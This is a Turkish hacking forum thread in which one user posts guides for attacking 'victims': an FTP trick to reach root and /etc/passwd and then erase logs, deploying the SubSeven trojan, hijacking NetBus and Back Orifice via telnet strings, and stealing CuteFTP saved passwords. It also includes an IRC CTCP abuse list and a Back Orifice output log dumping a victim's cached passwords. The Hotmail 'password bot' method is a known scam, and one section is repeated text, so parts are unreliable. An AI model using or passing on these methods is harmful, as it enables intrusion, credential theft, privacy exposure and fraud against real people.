İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Server hack...!

08-07-2012 22:43
#1
HacKeRSuHa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Mesajlar:
243
Teşekkür (Etti):
44
Teşekkür (Aldı):
29
Konular:
65
Ticaret:
(0) %
SERVER HACK…

Internete baglandiktan sonra hemen dos komut istemine'e cikin...

Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin internic.com a gidin search yapin sayfanin en altinda yazar..

ftp kurban.com

server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp

Sonra mutlaka log file ini silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..

Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan calisiyor..

LINUX SERVER HACK…

Internete baglandiktan sonra hemen dos komut istemine'e cikin...

Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin
internic.com a gidin search yapin sayfanin en altinda yazar.. ftp kurban.com
server username sorcak entera basip gecin server password sorcak entera basip
bunuda gecin ve sunu yazin quote user ftp sonra bunu quote cwd ~root son
olarakta bunu quote pass ftp Sonra mutlaka log file ini silin cunku sizin girdiginizi
anlayabilirler.. Password dosyasi su dizinin icinde " /etc/passwd " Eger
yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz,
bilmeyenler icin soleyelim root password en yuksek seviyedeki passdir onunla
herseyi yapabilirsiniz.. Not: Bu yontem yeni serverlarda calismiyor. Universitelerde
filan calisiyor..

SUBSEVEN NEDIR.NASIL KULLANILIR….

SubSeven'i uzaktan yonetim icin veya hacking programi olarak kullanabilirsiniz. Zip dosyasinin icinde iki tane program var bi tanesi server.exe bunu kurbanin bilgisayarinda calistirmalisiniz netbustan filan girip upload edebilirisiniz. Sebseven.exe ise esas program her seyi bu program sayesinde yapacaksiniz...

Nasil Çalisiyor:
Kullanimi basit bi trojan. Kurban bilgisayarda server.exeyi calistiriyorsunuz, gostermelik bi hata mesaji belirecek [soyle: error loading system resources]. bundan sonra program kendini otomatik hardiske kuracak, ve windows her acildiginda oda acilacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi bundan yapacaksiniz.

Özellikler:
+ Adama mesaj yollarsiniz, ve cevap verebilir

+ Browseri acip istediginiz siteye yonlendirirsiniz

+ Start butonunu saklar

+ Kullanicinin dektop goruntusunu alabilirsiniz..

+ Keyboard tuslari calismaz

+ Kurban'la chat yapabilirsiniz. Icq chat gibi bir programi var her zaman ustte olucak yani hic bi zaman kucultemez. Chatlesirken bi kac numara yapabilirsiniz. .Kurbanin yazdigi yer kaybolur sadece sizin yazdiklarinizi gorur kendisi yazamaz. Chat'ide kapatamaz ancak bilgisayari kapamak zorunda kalir..

+ Pc Speaker'i acip kapar.

+ Windowsu yeniden baslatir.

+ CD-ROM'u acip kapar

+ Mouse trail'i ekleyebilirsiniz.[Hani su mouse'un arkasindan gelen bi ok daha varya o iste]

+ Server'a sifre koyabilirsiniz.

+ Acik olan pencerelrin listesini alabilirsiniz:

- Istediginiz pencereyi kapayabilirsiniz

- enable/disable yapabilirsiniz.Kurban pencereyi acamaz

- Pencereyi kapama tusunu iptal edebilirsiniz

+ Kurbanin bilgisyarindaki butun suruculerin listesini verir.

+ Monitoru acip/kapar.

+ Gorev cubugunu saklar.

+ Kullanicinin bilgisayari hakkinda daha detayli bilgi alabilirsiniz.Windows version,

kullanici adi, sirket adi, ekran cozunurlugu gibin..

+ Server'in ismini deistirebilirsiniz

+ listen for all the pressed keys. you'll see all the keys pressed by the

victim. useful to get passwords.

+ Ses kaydeder. Kac saniyelik ses kaydi istiyorsaniz yaziyorsunuz. Ve kayit bittiginde

server size yolluyor. Tabii kullanicinin mikrofonu varsa..

+ Dosya Yoneticisi.Kurbanin bilgisyarindaki butun dosyalari gorebilirsiniz. Bi klasore iki

kere tikladiginizda istediginizi yapabilirsiniz:

- dosyanin boyutunu gorebilirsiniz

- dosya download edebilirsiniz

- Bmp veya Jpg dosyasi ise wallpaper yapabilirsiniz.

- dosya silebilirsiniz

- Wav dosyalarini calabilirsiniz

- Istediginiz programi/trojani kullanicinin bilgisayarinda calistirabilirsiniz.

+ Mouse tuslarinin yerlerini degistirir..Sola bastiginda sag sag bastiginda sol tusun

gorevini yapar..

+ Kurban online olunca haber verir. Bunu E-mail serveri kullanarak yapabilirsiniz, icqdan

kurban her online oldugunda size ip numarasini belirten bir mesaj gelir.

+ Server'i kapar.Fakat kullanici bilgisayari bi daha actiginda server yeniden acilir..

NETBUS SIFRELERINI KIRMAK....

1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli program ile bunu yapmak çok kolay ustdeki bolume
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz sonra assagi tarafa yeni sifreyi yazip giriyoruz.

2.)Yöntem Telnetle:

Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.

Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreye dephiberoptik yaziyoruz
CUTE FTP KULLANICILARIN SIFFELERINI ÇALMAK....

Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu gibi konularda en önemli olay mantiktir.. Bu hack olayi için karsi tarafin BOSERVE yada PATCH gibi yem programciklarini çalistirmasi gerekir.. Bunu yaptigini farzedelim! Her FTP programinin sifreleri kaydettigi bir DATA dosyasi vardir. Genelde ençok kullanilan CUTEFTP dir. Bu ftp programi kaydedilen sifreleri, SMDATA.DAT dosyasinda sakliyor.. Karsidaki kurbanin SMDATA.DAT dosyasini aliniz.. Bunuda su yolu takip ederek bulabilirsiniz.. Genelde : /PROGRA~1/CUTEFTP/SMDATA.DAT dir. Bu dosyayi kendi cuteftp nizin oldugu yere kopyalayin.. fakat bundan önce kendinizinkini yedekleyinki sizin sifreler silinmesin.. Daha sonra bu dosyadan sifreleri alin..

BILGISAYARA GIRME....
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calistirin... Baglana gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede buldugumuz ip'i yaziyoruz. Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz..baglana tikliyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. Simdi sifreyi kirmak için Password;1;123 ServerPwd;onurbu yaziyi paste'liyoruz...ve sifre ufuk oluyor,siz sifreyi ufuk yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artik sifre ufuk giriyoruz...Artik adamin bilgisayarindayyz..file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor.. c:\windows yazarak windowsun altina atiyoruz. yolladiktan sonra download ewkranini kapiyoruz.. start program diyoruz...c:\windows\boserve.exe diyoruz..tamam netbustaki isimizde bitti..
Simdi Back Orifice'ye geçiyoruz.target hostorta adamin ipsini yaziyoruz..yan tarafada 12345 yan taraftan system passwordsu seçip send e basiyoruz ve bingoooo bu adimda 10un ustunde password varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.. bu arada adamdan cikan passler..
** 0:Ping host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet Service\100000000@worldnet.att.net' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak'
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnyk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Ba?lantym 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG·('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>ß'
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AYDATA\suen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*Rna\Ba?lantym 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Ba?lantym 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password: 'burakì'
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'

HOTMAIL HACK....

1-Önce hotmailden bir hesap alin veya hesabiniz varsa
almana gerek yok.
2-Hotmail mailine girin.
3-Yeni bir mail yarat
4-Mailin Subject bölümüne "retrieve password" yaz
5-Gidecek adres
bölümüne:"mspport_recovery_bot@hotmail.com" yazi
6-Mesaj bölümüne asagidakileri yaz:
ARKADASININ LOGIN ADI(örnegin mail adresi sonkurban@hotmail.com ise sonkurban yaz..) /cgi-bin/start/v7.03/method=getassmachine+SENINHOTMAILSIFREN{M27568&j ava-&rsa
Bu maili gönderdikten sonra sana "from:system subject:system reg message" baslikli mail gelecek ve bu mailde o kisinin hotmail sifresi olcak

SCRIPT YÖNETMEK ...

Dragon ve Solucan Script Kullanicilarini yönetmek.Yukarda ismi yazili scriptleri kullanan masumca chatini yapan kisilere irc yi zindan etmek artik çok basit.CTCP özelliklerini kullanarak en basiti kurbanin nickini degistirmekten baslayan ve her türlü mirc
komutunu kullanmanizi saglayan komutlari açikliyorum.
Nick Degistirme /ctcp nick LAGG /nick yeni nick
Kanala Sokma /ctcp nikc LAGG /join #kanal
Kanala yazi yazdirma /ctcp nick LAGG /msg #kanal mesaj
Kurbani ircden çikarma /ctcp nick LAGG /quit (mesaj istenirse)
Kurbanin mIRC ini kapama /ctcp nick LAGG /exit
Sizinde gördügünüz gibi aslinda olay sadece /ctcp nick
LAGG den sonra yazdiginiz komutlarin kurban tarafindan
uygulanmasindan baska birsey degildir.

SERVER-COKERTME....
Internete baglandiktan sonra hemen dos komut istemine'e cikin...
Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin internic.com a gidin search yapin sayfanin en altinda yazar..
ftp kurban.com
server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp
Sonra mutlaka log file ini silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..
Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan calisiyor..

NOT: Yukaridaki Bilgiler Egitim Amaçlidir.
Kullanıcı İmzası
TURK HACK TEAM
ONE OKTAY Teşekkür etti.

08-07-2012 22:45
#2
ByKira - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
Diyarbakır
Mesajlar:
152
Teşekkür (Etti):
7
Teşekkür (Aldı):
22
Konular:
31
Ticaret:
(0) %
Güzel paylaşım
Kullanıcı İmzası
Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]
08-07-2012 22:45
#3
ByKira - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
Diyarbakır
Mesajlar:
152
Teşekkür (Etti):
7
Teşekkür (Aldı):
22
Konular:
31
Ticaret:
(0) %
AmA YAZI BÜYÜK sanırım forum kurallarına göre uygun degil
Kullanıcı İmzası
Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]
08-07-2012 22:47
#4
HacKeRSuHa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Mesajlar:
243
Teşekkür (Etti):
44
Teşekkür (Aldı):
29
Konular:
65
Ticaret:
(0) %
Rahat okumanız amaçlı büyük yazdım yoksa okadar yazı küçük okunmaz sizin iyliğiniz düşnüyorum
Kullanıcı İmzası
TURK HACK TEAM
08-07-2012 22:49
#5
ByKira - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
Diyarbakır
Mesajlar:
152
Teşekkür (Etti):
7
Teşekkür (Aldı):
22
Konular:
31
Ticaret:
(0) %
Yok yani forumde bir ara okudum belli bir büyüklügü geçince silierler konuyu
Kullanıcı İmzası
Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]
08-07-2012 22:51
#6
HacKeRSuHa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Mesajlar:
243
Teşekkür (Etti):
44
Teşekkür (Aldı):
29
Konular:
65
Ticaret:
(0) %
Emeğe saygı amaçlı teşekkür verirsen sevinirm
Kullanıcı İmzası
TURK HACK TEAM

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı